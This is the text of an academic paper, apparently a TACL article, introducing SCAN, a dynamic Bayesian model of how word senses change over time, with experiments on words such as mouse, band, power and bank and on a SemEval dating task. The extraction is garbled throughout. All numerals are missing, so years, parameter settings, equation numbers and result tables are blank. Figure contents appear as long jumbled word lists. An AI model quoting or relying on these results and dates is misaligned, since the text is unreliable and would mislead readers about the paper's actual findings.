mouse which initially was only used in the rodent sense. the oed dates the computer pointing device sense of mouse to . the latter sense has become par- ticularly dominant in recent decades due to the ever- increasing use of computer technology. the arrival of large-scale collections of historic texts (davies, ) and online libraries such as the internet archive and google books have greatly facilitated computational investigations of language change. the ability to automatically detect how the meaning of words evolves over time is potentially of significant value to lexicographic and linguistic research but also to real world applications. time- specific knowledge would presumably render word meaning representations more accurate, and benefit several downstream tasks where semantic informa- tion is crucial. examples include information re- trieval and question answering, where time-related information could increase the precision of query disambiguation and document retrieval (e.g., by re- turning documents with newly created senses or fil- tering out documents with obsolete senses). in this paper we present a dynamic bayesian model of diachronic meaning change. word mean- ing is modeled as a set of senses, which are tracked over a sequence of contiguous time intervals. we infer temporal meaning representations, consisting of a word’s senses (as a probability distribution over words) and their relative prevalence. our model is thus able to detect that mouse had one sense until the mid- th century (characterized by words such as {cheese, tail, rat}) and subsequently acquired a transactions of the association for computational linguistics, vol. , pp. – , . action editor: tim baldwin. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. second sense relating to computer device. more- over, it infers subtle changes within a single sense. for instance, in the s the words {cable, ball, mousepad} were typical for the computer device sense, whereas nowadays the terms {optical, laser, usb} are more typical. contrary to previous work (mitra et al., ; mihalcea and nastase, ; gu- lordava and baroni, ) where temporal represen- tations are learnt in isolation, our model assumes that adjacent representations are co-dependent, thus capturing the nature of meaning change being fun- damentally smooth and gradual (mcmahon, ). this also serves as a form of smoothing: temporally neighboring representations influence each other if the available data is sparse. experimental evaluation shows that our model (a) induces temporal representations which reflect word senses and their development over time, (b) is able to detect meaning change between two time pe- riods, and (c) is expressive enough to obtain useful features for identifying the time interval in which a piece of text was written. overall, our results indi- cate that an explicit model of temporal dynamics is advantageous for tracking meaning change. com- parisons across evaluations and against a variety of related systems show that despite not being designed with any particular task in mind, our model performs competitively across the board. related work most work on diachronic language change has fo- cused on detecting whether and to what extent a word’s meaning changed (e.g., between two epochs) without identifying word senses and how these vary over time. a variety of methods have been applied to the task ranging from the use of statistical tests in order to detect significant changes in the distribution of terms from two time periods (popescu and strap- parava, ; cook and stevenson, ), to train- ing distributional similarity models on time slices (gulordava and baroni, ; sagi et al., ), and neural language models (kim et al., ; kulkarni et al., ). other work (mihalcea and nastase, ) takes a supervised learning approach and pre- dicts the time period to which a word belongs given its surrounding context. bayesian models have been previously developed for various tasks in lexical semantics (brody and la- pata, ; ó séaghdha, ; ritter et al., ) and word meaning change detection is no exception. using techniques from non-parametric topic model- ing, lau et al. ( ) induce word senses (aka. top- ics) for a given target word over two time periods. novel senses are then are detected based on the discrepancy between sense distributions in the two periods. follow-up work (cook et al., ; lau et al., ) further explores methods for how to best measure this sense discrepancy. rather than infer- ring word senses, wijaya and yeniterzi ( ) use a topics-over-time model and k-means clustering to identify the periods during which selected words move from one topic to another. a non-bayesian approach is put forward in mi- tra et al. ( , ) who adopt a graph-based framework for representing word meaning (see tah- masebi et al. ( ) for a similar earlier proposal). in this model words correspond to nodes in a se- mantic network and edges are drawn between words sharing contextual features (extracted from a depen- dency parser). a graph is constructed for each time interval, and nodes are clustered into senses with chinese whispers (biemann, ), a randomized graph clustering algorithm. by comparing the in- duced senses for each time slice and observing inter- cluster differences, their method can detect whether senses emerge or disappear. our work draws ideas from dynamic topic mod- eling (blei and lafferty, b) where the evolu- tion of topics is modeled via (smooth) changes in their associated distributions over the vocabulary. although the dynamic component of our model is closely related to previous work in this area (mimno et al., ), our model is specifically constructed for capturing sense rather than topic change. our ap- proach is conceptually similar to lau et al. ( ). we also learn a joint sense representation for multi- ple time slices. however, in our case the number of time slices in not restricted to two and we explicitly model temporal dynamics. like mitra et al. ( , ), we model how senses change over time. in our model, temporal representations are not inde- pendent, but influenced by their temporal neighbors, encouraging smooth change over time. we therefore induce a global and consistent set of temporal repre- sentations for each word. our model is knowledge- lean (it does not make use of a parser) and language independent (all that is needed is a time-stamped corpus and tools for basic pre-processing). contrary to mitra et al. ( , ), we do not treat the tasks of inferring a semantic representation for words and their senses as two separate processes. evaluation of models which detect meaning change is fraught with difficulties. there is no stan- dard set of words which have undergone meaning change or benchmark corpus which represents a va- riety of time intervals and genres, and is thematically consistent. previous work has generally focused on a few hand-selected words and models were evalu- ated qualitatively by inspecting their output, or the extent to which they can detect meaning changes from two time periods. for example, cook et al. ( ) manually identify target words which un- dergo meaning change in a focus corpus with re- spect to a reference corpus (both news text). they then assess how their models fare at learning sense differences for these targets compared to distractors which did not undergo meaning change. they also underline the importance of using thematically com- parable reference and focus corpora to avoid spuri- ous differences in word representations. in this work we evaluate our model’s ability to detect and quantify meaning change across several time intervals (not just two). instead of relying on a few hand-selected target words, we use larger sets sampled from our learning corpus or found to undergo meaning change in a judgment elicitation study (gulordava and baroni, ). in addition, we adopt the evaluation paradigm of mitra et al. ( ) and validate our findings against wordnet. finally, we apply our model to the recently es- tablished semeval- diachronic text evaluation subtasks (popescu and strapparava, ). in order to present a consistent set of experiments, we use our own corpus throughout which covers a wider range of time intervals and is compiled from a variety of genres and sources and is thus thematically coher- ent (see section for details). wherever possible, we compare against prior art, with the caveat that the use of a different underlying corpus unavoidably influences the obtained semantic representations. a bayesian model of sense change in this section we introduce scan, our dynamic bayesian model of sense change. scan captures how a word’s senses evolve over time (e.g., whether new senses emerge), whether some senses become more or less prevalent, as well as phenomena per- taining to individual senses such as meaning exten- sion, shift, or modification. we assume that time is discrete, divided into contiguous intervals. given a word, our model infers its senses for each time in- terval and their probability. it captures the gradual nature of meaning change explicitly, through depen- dencies between temporally adjacent meaning rep- resentations. senses themselves are expressed as a probability distribution over words, which can also change over time. . model description we create a scan model for each target word c. the input to the model is a corpus of short text snippets, each consisting of a mention of the target word c and its local context w (in our experiments this is a sym- metric context window of ± words). each snip- pet is annotated with its year of origin. the model is parametrized with regard to the number of senses k ∈ [ ...k] of the target word c, and the length of time intervals ∆t which might be finely or coarsely defined (e.g., spanning a year or a decade). we conflate all documents originating from the same time interval t ∈ [ ...t] and infer a tempo- ral representation of the target word per interval. a temporal meaning representation for time t is (a) a k-dimensional multinomial distribution over word senses φt and (b) a v -dimensional distribution over the vocabulary ψt,k for each word sense k. in ad- dition, our model infers a precision parameter κφ, which controls the extent to which sense prevalence changes for word c over time (see section . for details on how we model temporal dynamics). we place individual logistic normal priors (blei and lafferty, a) on our multinomial sense dis- tributions φ and sense-word distributions ψk. a draw from the logistic normal distribution con- sists of (a) a draw of an n-dimensional random vector x from the multivariate normal distribution parametrized by an n-dimensional mean vector µ and a n × n variance-covariance matrix Σ, x ∼ n(x|µ, Σ); and (b) a mapping of the drawn param- eters to the simplex through the logistic transforma- tion φn = exp(xn)/ ∑ n′ exp(xn′ ), which ensures a draw of valid multinomial parameters. the normal distributions are parametrized to encourage smooth wz z w z w φt− φt φt+ κφa,b ψt− ψt ψt+ κψ i dt− i dt i dt+ k draw κφ ∼ gamma(a,b) for time interval t = ..t do draw sense distribution φt|φ−t,κφ ∼n( (φt− + φt+ ),κφ) for sense k = ..k do draw word distribution ψt,k|ψ−t,κψ ∼n( (ψt− ,k+ψt+ ,k),κψ) for document d = ..d do draw sense zd ∼ mult(φt) for context position i = ..i do draw word wd,i ∼ mult(ψt,zd ) figure : left: plate diagram for the dynamic sense model for three time steps {t− , t, t+ }. constant parameters are shown as dashed nodes, latent variables as clear nodes, and observed variables as gray nodes. right: the corresponding generative story. change in multinomial parameters, over time (see section . for details), and the extent of change is controlled through a precision parameter κ. we learn the value of κφ during inference, which al- lows us to model the extent of temporal change in sense prevalence individually for each target word. we draw κφ from a conjugate gamma prior. we do not infer the sense-word precision parameter κψ on all ψk. instead, we fix it at a high value, trig- gering little variation of word distributions within senses. this leads to senses being thematically co- herent over time. we now describe the generative story of our model, which is depicted in figure (right), along- side its plate diagram representation (left). first, we draw the sense precision parameter κφ from a gamma prior. for each time interval t we draw (a) a multinomial distribution over senses φt from a lo- gistic normal prior; and (b) a multinomial distribu- tion over the vocabulary ψt,k for each sense k, from another logistic normal prior. next, we generate time-specific text snippets. for each snippet d, we first observe the time interval t, and draw a sense zd from mult(φt). finally, we generate i context words wd,i independently from mult(ψt,z d ). . background on igmrfs let φ = {φ ...φt} denote a t-dimensional random vector, where each φt might for example correspond to a sense probability at time t. we define a prior which encourages smooth change of parameters at neighboring times, in terms of a first order random walk on the line (graphically shown in figure , and the chains of φ and ψ in figure (left)). specifically, we define this prior as an intrinsic gaussian markov random field (igmrf; rue and held ), which allows us to model the change of adjacent parame- ters as drawn from a normal distribution, e.g.: ∆φt ∼n( ,κ− ). ( ) the igmrf is defined with respect to the graph in figure ; it is sparsely connected with only first- order dependencies which allows for efficient in- ference. a second feature, which makes igmrfs popular as priors in bayesian modeling, is the fact that they can be defined purely in terms of the lo- cal changes between dependent (i.e., adjacent) vari- ables, without the need to specify an overall mean of the model. the full conditionals explicitly cap- ture these intuitions: φt|φ−t,κ ∼n ( (φt− + φt+ ), κ ) , ( ) for < t < t , where φ−t is the vector φ ex- cept element φt and κ is a precision parameter. the value of parameter φt is distributed normally, cen- tered around the mean of the values of its neighbors, without reference to a global mean. the precision parameter κ controls the extent of variation: how tightly coupled are the neighboring parameters? or, φ φt− φt φt+ φt figure : a linear chain igmrf. in our case: how tightly coupled are temporally ad- jacent meaning representations of a word c? we es- timate the precision parameter κφ during inference. this allows us to flexibly capture sense variation over time individually for each target word. for a detailed introduction to (i)gmrfs we refer the interested reader to rue and held ( ). for an application of igmrfs to topic models see mimno et al. ( ). . inference we use a blocked gibbs sampler for approximate in- ference. the logistic normal prior is not conjugate to the multinomial distribution. this means that the straightforward parameter updates known for sam- pling standard, dirichlet-multinomial, topic models do not apply. however, sampling-based methods for logistic normal topic models have been proposed in the literature (mimno et al., ; chen et al., ). at each iteration, we sample: (a) document- sense assignments, (b) multinomial parameters from the logistic normal prior, and (c) the sense preci- sion parameter from a gamma prior. our blocked sampler first iterates over all input text snippets d with context w, and re-samples their sense assign- ments under the current model parameters {φ}t and {ψ}k×t , p(zd|w, t,φ,ψ) ∝ p ( zd|t ) p ( w|t,zd ) = φt zd ∏ w∈w ψt,z d w ( ) next, we re-sample parameters {φ}t and {ψ}k×t from the logistic normal prior, given the current sense assignments. we use the auxiliary variable method proposed in mimno et al. ( ) (see also groenewald and mokgatlhe ( )). intuitively, each individual parameter (e.g., sense k’s prevalence at time t, φtk) is ‘shifted’ within a weighted region which is bounded by the number of times sense k was observed at time t. the weights of the region are determined by the prior, in our case the normal distributions defined by the igmrf, which ensure corpus years covered #words coha – , , dte – , clmet . – , , table : size and coverage of our three training corpora (after pre-processing). an influence of temporal neighbors φt− k and φ t+ k on the new parameter value φtk, and smooth tempo- ral variation as desired. the same procedure applies to each word parameter under each {time, sense} ψ t,k w (see mimno et al. for a more detailed de- scription of the sampler). finally, we periodically re-sample the sense precision parameter κφ from its conjugate gamma prior. the date corpus before presenting our evaluation we describe the corpus used as a basis for the experiments per- formed in this work. we applied our model to a diachronic text corpus (date) which collates documents spanning years – from three sources: (a) the coha corpus (davies, ), a large collection of texts from various genres cover- ing the years – ; (b) the training data pro- vided by the dte task organizers (see section ); and (c) the portion of the clmet . corpus (diller et al., ) corresponding to the period – (which is not covered by the coha corpus and thus underrepresented in our training data). clmet . contains texts representative of a range of genres in- cluding narrative fiction, drama, letters, and was col- lected from various online archives. table pro- vides details on the size of our corpus. documents were clustered by their year of pub- lication as indicated in the original corpora. in the clmet . corpus, occasionally a range of years would be provided. in this case we used the fi- nal year of the range. we tokenized, lemmatized, and part of speech tagged date using the nltk (bird et al., ). we removed stopwords and func- tion words. after preprocessing, we extracted target http://corpus.byu.edu/coha/ http://alt.qcri.org/semeval /task / index.php?id=data-and-tools http://www.kuleuven.be/˜u / clmet _ .htm http://corpus.byu.edu/coha/ http://alt.qcri.org/semeval /task /index.php?id=data-and-tools http://alt.qcri.org/semeval /task /index.php?id=data-and-tools http://www.kuleuven.be/~u /clmet _ .htm http://www.kuleuven.be/~u /clmet _ .htm word-specific input corpora for our models. these consisted of mentions of a target c and its surround- ing context, a symmetric window of ± words. experiment : temporal dynamics as discussed earlier our model departs from previ- ous approaches (e.g., mitra et al. ) in that it learns globally consistent temporal representations for each word. in order to assess whether temporal dependencies are indeed beneficial, we implemented a stripped-down version of our model (scan-not) which does not have any temporal dependencies be- tween individual time steps (i.e., without the chain igmrf priors). word meaning is still represented as senses and sense prevalence is modeled as a dis- tribution over senses for each time interval. how- ever, time intervals are now independent. inference works as described in section . , without having to learn the κ precision parameters. models and parameters we compared the two models in terms of their predictive power. we split the date corpus into a training period {d ...dt} of time slices through t and computed the like- lihood p(dt+ |φt,ψt) of the data at test time slice t + , under the parameters inferred for the previous time slice. the time slice size was set to ∆t = years. we set the number of senses to k = , the word precision parameter κψ = , a high value which enforces individual senses to re- main thematically consistent across time. we set the initial sense precision parameter κφ = , and the gamma parameters a = and b = . these pa- rameters were optimized once on the development data used for the task-based evaluation discussed in section . unless otherwise specified all ex- periments use these values. no parameters were tuned on the test set for any task. in all exper- iments we ran the gibbs sampler for , itera- tions, and resampled κφ after every iterations, starting from iteration . we used the final state of the sampler throughout. we randomly selected mid-frequency target concepts from a larger set of target concepts described in section . predictive loglikelihood scores were averaged across concepts and were calculated as the average under param- eter samples {φt,ψt} from the trained models. - - - - − , − , · predicted time period lo gl ik el ih oo d scan scan-not figure : predictive log likelihood of scan and a ver- sion without temporal dependencies (scan-not) across various test time periods. results figure displays predictive loglikelihood scores for four test time intervals. scan outper- forms its stripped-down version throughout (higher is better). since the representations learnt by scan are influenced (or smoothed) by neighboring repre- sentations, they overfit specific time intervals less which leads to better predictive performance. fig- ure further shows how scan models meaning change for the words band, power, transport and bank. the sense distributions over time are shown as a sequence of stacked histograms, senses themselves are color-coded (and enumerated) below, in the same order as in the histograms. each sense k is illustrated as the words w assigned the highest posterior probability, marginalizing over the time- specific representations p(w|k) = ∑ t ψ t,k w . words representative of prevalent senses are highlighted in bold face. figure (top left) demonstrates that the model is able to capture various senses of the word band, such as strip used for binding (yellow bars/number in the figure) or musical band (grey/ , orange/ ). our model predicts an increase in prevalence over the modeled time period for both senses. this is cor- roborated by the oed which provides the majority of references for the binding strip sense for the th century and dates the musical band sense to . in addition a social band sense (violet/ , darkgreen/ ; in the sense of bonding) emerges, which is present across time slices. the sense colored brown/ refers to the british band, a group of native americans involved in the black hawk war in , and the model indeed indicates a prevalence of this sense around this time (see bars – in the figure). for the word power (figure (top right)), band band play people time little call father day love boy play band music time country day march military frequency jazz little hand play land love time night speak strong name little soldier leader time land arm hand country war indian music play dance band hear time little evening stand house black white hat broad gold wear hair band head rubber indian little day horse time people meet chief leave war play music hand hear sound march street air look strike power power idea god hand mind body life time object nature power nation world war country time government sir mean lord power time company water force line electric plant day run power government law congress executive president legislative constitution love power life time woman heart god tell little day mind power time life friend woman nature love world reason power people law government mind call king time hand nature power country government nation war increase world political people europe transport road cost public railway transport rail average service bus time ozone epa example section transport air policy region measure caa time transport land public ship line water vessel london joy air plane ship army day transport land look leave hand time road worker union service public system industry air railway air international worker plane association united union aircraft line president troop ship day land army war send plane supply fleet air joy love heart heaven time company eye hand smile bank bank tell cashier teller money day ned president house city bank note money deposit credit amount pay species issue bill bank money national note government credit united time currency loan bank dollar money note national president account director company little river day opposite mile bank danube town left country shore bank capital company stock rate national president fund city loan river water stream foot mile tree stand reach little land note bank money time tell leave hard day dollar account figure : tracking meaning change for the words band, power, transport and bank over -year time intervals between and . each bar shows the proportion of each sense (color-coded) and is labeled with the start year of the respective time interval. senses are shown as the most probable words, and particularly representative words are highlighted for illustration. time p (w |s , t ) time line water water company company power power company power power power nuclear line time power force power water company company power company plant nuclear power power water line company time power force force force plant nuclear plant plant water power time power force force water time plant electric electric time utility force force force line water time electric water water time time company company war war company time steam day day plant day force company utility time run day run steam electric line time day time day run run people equal house electric day run steam steam electric electric run utility electric energy carry run steam electric day purchase line steam run water day cost cost electric company day run plant run plant run line people force people run figure : sense-internal temporal dynamics for the energy sense of the word power (violet/ in figure ). columns show the ten most highly associated words for each time interval for the period between and (ordered by decreasing probability). we highlight how four terms characteristic of the sense develop over time (see {water, steam, plant, nuclear} in the figure). three senses emerge: the institutional power (col- ors gray/ , brown/ , pink/ , orange/ in the figure), mental power (yellow/ , lightgreen/ , darkgreen/ ), and power as supply of energy (violet/ ). the latter is an example of a “sense birth” (mitra et al., ): the sense was hardly present before the mid- th century. this is corroborated by the oed which dates the sense to , whereas the oed contains references to the remaining senses for the whole modeled time period, as predicted by our model. - - - - - - - - - - - - - - - - . . . pr ec is io n scan scan-not t t figure : precision results for the scan and scan-not models on the wordnet-based novel sense detection (exper- iment ). results are shown for a selection of reference times (t ) and focus times (t ). similar trends of meaning change emerge for transport (figure bottom left). the bot- tom right plot shows the sense development for the word bank. although the well-known senses river bank (brown/ , lightgreen/ ) and monetary institu- tion (rest) emerge clearly, the overall sense pattern appears comparatively stable across intervals indi- cating that the meaning of the word has not changed much over time. besides tracking sense prevalence over time, our model can also detect changes within individual senses. because we are interested in tracking se- mantically stable senses, we fixed the precision pa- rameter κψ to a high value, to discourage too much variance within each sense. figure illustrates how the energy sense of the word power (violet/ in figure ) has changed over time. characteristic terms for a given sense are highlighted in bold face. for example, the term “water” is initially prevalent, while the term “steam” rises in prevalence towards the middle of the modeled period, and is superseded by the terms “plant” and “nuclear” towards the end. experiment : novel sense detection in this section and the next we will explicitly eval- uate the temporal representations (i.e., probability distributions) induced by our model, and discuss its performance in the context of previous work. large-scale evaluation of meaning change is noto- riously difficult, and many evaluations are based on limited hand-annotated goldstandard data sets. mi- tra et al. ( ), however, bypass this issue by eval- uating the output of their system against wordnet (fellbaum, ). here, we consider their auto- matic evaluation of sense-births, i.e., the emergence of novel senses. we assume that novel senses are detected at a focus time t whilst being compared to a reference time t . wordnet is used to confirm that the proposed novel sense is indeed distinct from all other induced senses for a given word. method mitra et al.’s ( ) evaluation method presupposes a system which is able to detect senses for a set of target words and identify which ones are novel. our model does not automatically yield nov- elty scores for the induced senses. however, cook et al. ( ) propose several ways to perform this task post-hoc. we use their relevance score, which is based on the intuition that keywords (or collo- cations) which characterize the difference of a fo- cus corpus from a reference corpus are indicative of word sense novelty. we identify keywords for a focus corpus with re- spect to a reference corpus using kilgarriff’s ( ) method which is based on smoothed relative fre- quencies. the novelty of an induced sense s can be then defined in terms of the aggregate keyword probabilities given that sense (and focus time of in- terest): rel(s) = ∑ w∈w p(w|s,t ). ( ) where w is a keyword list and t the focus time. cook et al. ( ) suggest a straightforward extrap- olation from sense novelty to word novelty: rel(c) = max s rel(s), ( ) we set the smoothing parameter to n = , and like cook et al. ( ) retrieve the top keywords. t = – t = – union soviet united american union european war civil military people liberty dos system window disk pc operate program run computer de dos entertainment television industry program time business people world president entertainment company station radio station television local program network space tv broadcast air t = – t = – environmental supra note law protection id agency impact policy factor federal users computer window information software system wireless drive web building available virtual reality virtual computer center experience week community separation increase disk hard disk drive program computer file store ram business embolden table : example target terms (left) with novel senses (right) as identified by scan in focus corpus t (when compared against reference corpus t ). top: terms used in novel sense detection study (experiment ). bottom: terms from the gulordava and baroni ( ) gold standard (experiment ). where rel(c) is the highest novelty score assigned to any of the target word’s senses. a high rel(c) score suggests that a word has undergone meaning change. we obtained candidate terms and their associ- ated novel senses from the date corpus, using the relevance metric described above. the novel senses from the focus period and all senses induced for the reference period, except for the one corre- sponding to the novel sense, were passed on to mitra et al.’s ( ) wordnet-based evaluator which pro- ceeds as follows. firstly, each induced sense s is mapped to the wordnet synset u with the maximum overlap: synset(s) = arg max u overlap(s,u). ( ) next, a predicted novel sense n is deemed truly novel if its mapped synset is distinct from any synset mapped to a different induced sense: ∀s′synset(s′) = synset(n). ( ) finally, overall precision is calculated as the frac- tion of sense-births confirmed by wordnet over all birth-candidates proposed by the model. like mitra et al. ( ) we only report results on target words for which all induced senses could be successfully mapped to a synset. models and parameters we obtained the broad set of target words used for the task-based evalua- tion (in section ) and trained models on the date corpus. we set the number of senses k = fol- lowing mitra et al. ( ) who note that the word- net mapper works best for words with a small num- ber of senses, and the time intervals to ∆t = as in experiment . we identified words with highest novelty score (equation ( )) as sense birth candidates. we compared the performance of the full scan model against scan-not which learns senses independently for time intervals. we trained both models on the same data with identical pa- rameters. for scan-not, we must post-hoc iden- tify corresponding senses across time intervals. we used the jensen-shannon divergence between the reference- and focus-time specific word distribu- tions js(p(w|s,t )||p(w|s,t )) and assigned each focus-time sense to the sense with smallest diver- gence at reference time. results figure shows the performance of our models on the task of sense birth detection. scan performs better than scan-not, underscoring the importance of joint modeling of senses across time slices and incorporation of temporal dynamics. our accuracy scores are in the same ballpark as mitra et al. ( , ). note, however that the scores are not directly comparable due to differences in train- ing corpora, focus and reference times, and candi- date words. mitra et al. ( ) use the larger google syntactic n-gram corpus, as well as richer linguis- tic information in terms of syntactic dependencies. we show that our model which does not rely on syntactic annotations performs competitively even when trained on smaller data. table (top) displays examples of words assigned highest novelty scores for the reference period – and focus pe- riod – . this threshold was tuned on one reference-focus time pair. experiment : word meaning change in this experiment we evaluate whether model in- duced temporal word representations capture per- ceived word novelty. specifically, we adopt the eval- uation framework (and dataset) introduced in gulor- dava and baroni ( ) and discussed below. method gulordava and baroni ( ) do not model word senses directly; instead they obtain dis- tributional representations of words from the google books (bigram) data for two time slices, namely the s (reference corpus) and s (focus cor- pus). to detect change in meaning, they measure cosine similarity between the vector representations of a target word in the reference and focus corpus. it is assumed that low similarity indicates signifi- cant meaning change. to evaluate the output of their system, they created a test set of target words (nouns, verbs, and adjectives), and asked five anno- tators to rate each word with respect to its degree of meaning change between the s and the s. the annotators used a -point ordinal scale ( : no change, : almost no change, : somewhat change, : changed significantly). words were subsequently ranked according to the mean rating given by the annotators. inter-annotator agreement on the novel sense detection task was . (pairwise pearson cor- relation) and can be regarded as an upper bound on model performance. models and parameters we trained models for all words in gulordava and baroni’s ( ) gold- standard. we used the date subcorpus cover- ing years through partitioned by decade (∆t = ). the first and last time interval were defined as reference and focus time, respec- tively (t = – , t = – ). as in ex- periment , a novelty score was assigned to each target word (using equation ( )). we computed spearman’s ρ rank correlations between gold stan- dard and model rankings (gulordava and baroni, ). we trained scan models setting the num- ber of senses to k = . we also trained scan-not models with identical parameters. we report results averaged over five independent parameter estimates. finally, as in gulordava and baroni ( ) we com- pare against a frequency baseline which ranks words we thank kristina gulordava for sharing their evaluation data set of target words and human judgments. system corpus spearman’s ρ gulordava ( ) google . scan date . scan-not date . frequency baseline date . table : spearman’s ρ rank correlations between system novelty rankings and the human-produced ratings. all correlations are statistically significant (p < . ). re- sults for scan and scan-not are averages over five trained models. by their log relative frequency in the reference and focus corpus. results the results of this evaluation are shown in table . as can be seen, scan outperforms scan-not and the frequency baseline. for refer- ence, we also report the correlation coefficient ob- tained in gulordava and baroni ( ) but empha- size that the scores are not directly comparable due to differences in training data: gulordava and ba- roni ( ) use the google bigrams corpus (which is much larger compared to date). table (bottom) displays examples of words which achieved highest novelty scores in this evaluation, and their associated novel senses. experiment : task-based evaluation in the previous sections we demonstrated how scan captures meaning change between two periods. in this section, we assess our model on an extrinsic task which relies on meaning representations span- ning several time slices. we quantitatively evaluate our model on the semeval- benchmark datasets released as part of the diachronic text evaluation exercise (popescu and strapparava ; dte). in the following we first present the dte subtasks, and then move on to describe our training data, parame- ter settings, and systems used for comparison to our model. semeval dte tasks diachronic text evaluation is an umbrella term used by the semeval- or- ganizers to represent three subtasks aiming to assess the performance of computational methods used to identify when a piece of text was written. a simi- lar problem is tackled in chambers ( ) who la- bel documents with time stamps whilst focusing on explicit time expressions and their discriminatory power. the semeval data consists of news snip- pets, which range between a few words and mul- tiple sentences. a set of training snippets, as well as gold-annotated development and test datasets are provided. dte subtasks and involve tempo- ral classification: given a news snippet and a set of non-overlapping time intervals covering the pe- riod through , the system’s task is to se- lect the interval corresponding to the snippet’s year of origin. temporal intervals are consecutive and constructed such that the correct interval is centered around the actual year of origin. for both tasks tem- poral intervals are created at three levels of granular- ity (fine, medium, and coarse). subtask involves snippets which contain an ex- plicit cue for time of origin. the presence of a temporal cue was determined by the organizers by checking the entities’ informativeness in external re- sources. consider the example below: ( ) president de gaulle favors an independent european nuclear striking force [...] the mentions of french president de gaulle and nu- clear warfare suggest that the snippet was written after the mid- s and indeed it was published in . a hypothetical system would then have to de- cide amongst the following classes: { – , – , ..., – , ..., – } { – , – , ..., – , ..., – } { – , – , ..., – , ..., – } the first set of classes correspond to fine-grained in- tervals of -years, the second set to medium-grained intervals of -years and the third set to coarse- grained intervals of -years. for the snippet in example ( ) classes – , – , and – are the correct ones. subtask involves temporal classification of snip- pets which lack explicit temporal cues, but contain implicit ones, e.g., as indicated by lexical choice or spelling. the snippet in example ( ) was published in and the spelling of to-day, which was com- mon up to the early th century, is an implicit cue: ( ) the local wheat market was not quite so strong to-day as yesterday. analogously to subtask , systems must select the right temporal interval from a set of contiguous time intervals of differing granularity. for this task, which is admittedly harder, levels of temporal gran- ularity are coarser corresponding to -year, -year and -year intervals. participating semeval systems we compared our model against three other systems which par- ticipated in the semeval task. ambra (zampieri et al., ) adopts a learning-to-rank modeling ap- proach and uses several stylistic, grammatical, and lexical features. ixa (salaberri et al., ) uses a combination of approaches to determine the pe- riod of time in which a piece of news was writ- ten. this involves searching for specific mentions of time within the text, searching for named enti- ties present in the text and then establishing their reference time by linking these to wikipedia, using google n-grams, and linguistic features indicative of language change. finally, ucd (szymanski and lynch, ) employs svms for classification us- ing a variety of informative features (e.g., pos-tag n-grams, syntactic phrases), which were optimized for the task through automatic feature selection. models and parameters we trained our model for individual words and obtained representations of their meaning for different points in time. our set of target words consisted of all nouns which oc- curred in the development datasets for dte sub- tasks and as well as all verbs which occurred at least twice in this dataset. after removing in- frequent words we were left with words (out of , ) which we used in this evaluation. target words were not optimized with respect to the test data in any way; it is thus reasonable to expect bet- ter performance with an adjusted set of words. we set the model time interval to ∆t = years and the number of senses per word to k = . we also evaluated scan-not, the stripped-down version of scan, with identical parameters. both scan and scan-not predict the time of origin for a test snippet as follows. we first detect mentions of target words in the snippet. then, for each men- tion c we construct a document, akin to the training documents, consisting of c and its context w, the ± words surrounding c. given {c,w}, we approximate we do not report results for the system usaar which achieved close to % accuracy by searching for the test snip- pets on the web, without performing any temporal inference. task task yr yr yr yr yr yr acc p acc p acc p acc p acc p acc p baseline . . . . . . . . . . . . scan-not . . . . . . . . . . . . scan . . . . . . . . . . . . ixa . . . . . . . . . . . . ambra . . . . . . . . . . . . ucd – – – – – – . . . . . . svm scan . . . . . . . . . . . . svm scan+ngram . . . . . . . . . . . . table : results on diachronic text evaluation tasks and for a random baseline, our scan model, its stripped- down version without igmrfs (scan-not), the semeval submissions (ixa, ambra and ucd), and svms trained with scan features (svm scan), and with additional character n-gram features (svm scan+ngram). results are shown for three levels of granularity, a strict precision measure p, and a distance-discounting measure acc. a distribution over time intervals as: p(c)(t|w) ∝ p(c)(w|t) ×p(c)(t) ( ) where the superscript (c) indicates parameters from the word-specific model, we marginalize over senses and assume a uniform distribution over time slices p(c)(t). finally, we combine the word-wise predic- tions into a final distribution p(t) = ∏ c p (c)(t|,w), and predict the time t with highest probability. supervised classification we also apply our model in a supervised setting, i.e., by extracting features for classifier prediction. specifically, we trained a multiclass svm (chang and lin, ) on the training data provided by the semeval organiz- ers (for dte tasks and ). for each observed word within each snippet, we added as feature its most likely sense k given t, the true time of origin: arg max k p(c)(k|t). ( ) we also trained a multiclass svm which uses char- acter n-gram (n ∈ { , , }) features in addition to the model features. szymanski and lynch ( ) identified character n-grams as the most predictive feature for temporal text classification using svms. their system (ucd) achieved the best published scores in dte subtask . following their approach, we included all n-grams that were observed more than times in the dte training data. results we employed two evaluation measures proposed by the dte organizers. these are pre- cision p, i.e., the percentage of times a system has predicted the correct time period. and accuracy acc which is more lenient, and penalizes system predic- tions proportional to their distance from the true in- terval. we compute the p and acc scores for our models using the evaluation script provided by the semeval organizers. table summarizes our re- sults for dte subtasks and . we compare scan against a baseline which selects a time interval at random averaged over five runs. we also show re- sults for a stripped-down version of our model with- out the igmrfs (scan-not) and for the systems which participated in semeval. for subtask , the two versions of scan out- perform all semeval systems across the board. scan-not occasionally outperforms scan in the strict precision metric, however, the full scan model consistently achieves better accuracy scores which are more representative since they factor in the proximity of the prediction to the true value. in subtask , the ucd and svm scan+ngram systems perform comparably. they both use svms for the classification task, however our own model employs a less expressive feature set based on scan and character n-grams, and does not take advantage of feature selection which would presumably enhance performance. with the exception of ambra, all other participating systems used external resources (such as wikipedia and google n-grams); it is thus fair to assume they had access to at least as much training data as our scan model. consequently, the we recomputed the baseline scores for subtasks and due to inconsistencies in the results provided by the dte organizers. gap in performance can not solely be attributed to a difference in the size of the training data. we also observe that ixa and scan, given iden- tical granularity, perform better on subtask , while ambra and our own svm-based systems exhibit the opposite trend. the ixa system uses a combi- nation of knowledge sources in order to determine when a piece of news was written, including ex- plicit mentions of temporal expressions within the text, named entities, and linked information to those named entities from wikipedia. ambra on the other hand exploits more shallow stylistic, grammat- ical and lexical features within the learning-to-rank paradigm. an interesting direction for future work would be to investigate which features are most ap- propriate for different dte tasks. overall, it is en- couraging to see that the generic temporal word rep- resentations inferred by scan lead to competitively performing models on both temporal classification tasks without any explicit tuning. conclusion in this paper we introduced scan, a dynamic bayesian model of diachronic meaning change. our model learns a coherent set of co-dependent time-specific senses for individual words and their prevalence. evaluation of the model’s output showed that the learnt representations reflect (a) dif- ferent senses of ambiguous words (b) different kinds of meaning change (such as new senses being estab- lished), and (c) connotational changes within senses. scan departs from previous work in that it models temporal dynamics explicitly. we demonstrated that this feature yields more general semantic represen- tations as indicated by predictive loglikelihood and a variety of extrinsic evaluations. we also experi- mentally evaluated scan on novel sense detection and the semeval dte task, where it performed on par with the best 